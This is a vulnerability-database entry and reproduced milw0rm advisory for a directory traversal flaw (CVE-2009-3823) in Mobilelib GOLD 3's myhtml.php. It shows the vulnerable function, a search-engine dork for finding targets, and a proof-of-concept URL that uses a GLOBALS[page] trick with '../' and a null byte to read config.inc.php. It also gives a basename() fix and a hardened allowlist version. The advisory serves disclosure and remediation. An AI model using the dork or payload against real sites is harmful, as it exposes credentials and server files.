Ac4p mobilelib_gold directory traversal vulnerability

Vulnerability ID: 1118107    Vulnerability type: Path traversal
Published: 2009-07-14    Updated: 2009-07-14
CVE ID: CVE-2009-3823    CNNVD-ID: CNNVD-200910-414
Platform: PHP    CVSS score: 4.3
|Vulnerability sources
https://www.exploit-db.com/exploits/9144
https://www.securityfocus.com/bid/44186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200910-414
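|Vulnerability details
A directory traversal vulnerability exists in myhtml.php in Mobilelib GOLD version 3.0. An attacker first needs to upload a malicious file or inject arbitrary commands into an existing file, and then sends a specially crafted URL request to the myhtml.php script using the GLOBALS[page] parameter in order to specify a malicious file on the local system. Successful exploitation allows the attacker to obtain sensitive information or execute arbitrary code on the vulnerable web server.
|Exploit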
By Qabandi
From Kuwait, PEACE...
iqa[a]hotmail.fr

=Vuln:		Mobilelib Gold v3 Local File Disclosure Vulnerability
=INFO:		http://www.ac4p.com/
=BUY:  		http://www.ac4p.com/
=Download:      ~~~
=DORK:		intext:"English for dummies"

                                  ____________
                              _-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````

Magic_quotes MUST BE ON :)

---------------------------------------===--------------------------------------

                                _________________
                            _-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
{
      // $page goes into the file path unvalidated
      if (file_exists("./myhtmlpages/".$page.".html")) {
            $templat="./myhtmlpages/".$page.".html";
            $tempindex=@fopen($templat,"r");
            $html=@fread($tempindex,@filesize($templat));
            @fclose($tempindex);
      } else {
            // Message text: "Could not find the template file."
            $html ="<p align=\"center\"> لم يستطع إيجاد ملف القالب.</p>";
      }
      return $html;
}

---------------------------------------===--------------------------------------

                                     _______
                                 _-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
 We will bypass the security, where it takes all _GET variables and scans if
 they contain harmful tags such as the null char (%00) ..etc
 
 We will bypass it by using an old GLOBALS[] trick ;)


http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00


---------------------------------------===--------------------------------------

                                    __________
                                _-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"

function getthememyhtml($page)
{
      $page = basename($page); //<---- Added the good old Basename func ;)
      if (file_exists("./myhtmlpages/".$page.".html")) {
            $templat="./myhtmlpages/".$page.".html";
            $tempindex=@fopen($templat,"r");
            $html=@fread($tempindex,@filesize($templat));
            @fclose($tempindex);
      } else {
            // Message text: "Could not find the template file."
            $html ="<p align=\"center\"> لم يستطع إيجاد ملف القالب.</p>";
      }
      return $html;
}


---------------------------------------===--------------------------------------

# milw0rm.com [2009-07-14]
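
A stricter variant of the basename() fix above, shown as an added example that is not part of the original advisory or of Mobilelib GOLD. The function name getthememyhtml_hardened, the constant MYHTML_DIR, the allowlist pattern and the English error message are assumptions; it needs PHP 5.3 or later for __DIR__.

```php
<?php
// Added example: hardened variant of getthememyhtml(). The constant name and
// the allowlist pattern are assumptions, not Mobilelib GOLD code.
define('MYHTML_DIR', __DIR__ . '/myhtmlpages');

function getthememyhtml_hardened($page)
{
    $notFound = '<p align="center">Template file not found.</p>';

    // Only accept a plain string; array input such as page[]=x is rejected.
    if (!is_string($page)) {
        return $notFound;
    }

    // Allowlist: letters, digits, underscore, hyphen. This rejects "/", "\",
    // "." and the NUL byte in one step, so neither "../" nor "%00" survives.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $page)) {
        return $notFound;
    }

    // Resolve symlinks and confirm the result is still inside MYHTML_DIR.
    $base = realpath(MYHTML_DIR);
    $path = realpath(MYHTML_DIR . '/' . $page . '.html');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return $notFound;
    }

    $html = file_get_contents($path);
    return $html === false ? $notFound : $html;
}

// Read the parameter explicitly from $_GET rather than from a variable that
// request input may have populated in the global scope.
$page = isset($_GET['page']) ? $_GET['page'] : '';
echo getthememyhtml_hardened($page);
```

Unlike basename() alone, the allowlist also refuses the NUL byte, so the ".html" suffix cannot be cut off on PHP versions that truncate paths at NUL.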
|Affected products
Mobilelib Mobilelib GOLD 3
|References

Source: XF
Name: mobilelib-myhtml-file-include(51713)
Link: http://xforce.iss.net/xforce/xfdb/51713
Source: MILW0RM
Name: 9144
Link: http://www.milw0rm.com/exploits/9144